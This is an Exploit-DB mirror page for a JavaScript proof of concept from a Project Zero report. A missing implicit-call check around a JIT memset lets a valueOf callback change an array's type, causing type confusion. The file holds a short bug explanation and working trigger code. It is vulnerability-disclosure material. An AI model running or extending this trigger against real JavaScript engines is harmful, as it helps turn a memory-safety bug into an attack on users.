bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/windows/dos/43154.js
Offensive Security 36c084c351 DB: 2021-09-03 
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

54 lines
No EOL
1,013 B
JavaScript
Raw Blame History

/*
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1357
function opt(a, b, v) {
if (b.length < 1)
return;
for (let i = 0; i < a.length; i++)
a[i] = v;
b[0] = 2.3023e-320;
}
The above JavaScript code is JITed as follows:
... CHECKING THE TYPE OF B ...
OP_Memset(a, v, a.length);
b[0] = 2.3023e-320;
But there's no ImplicitCallFlags checks around OP_Memset. So it fails to detect if the type of "b" was changed after the "OP_Memset" called.
The PoC shows that it can result in type confusion.
PoC:
*/
function opt(a, b, v) {
if (b.length < 1)
return;
for (let i = 0; i < a.length; i++)
a[i] = v;
b[0] = 2.3023e-320;
}
function main() {
for (let i = 0; i < 1000; i++) {
opt(new Uint8Array(100), [1.1, 2.2, 3.3], {});
}
let a = new Uint8Array(100);
let b = [1.1, 2.2, 3.3];
opt(a, b, {
valueOf: () => {
b[0] = {};
return 0;
}
});
print(b[0]);
}
main();
Reference in a new issue View git blame Copy permalink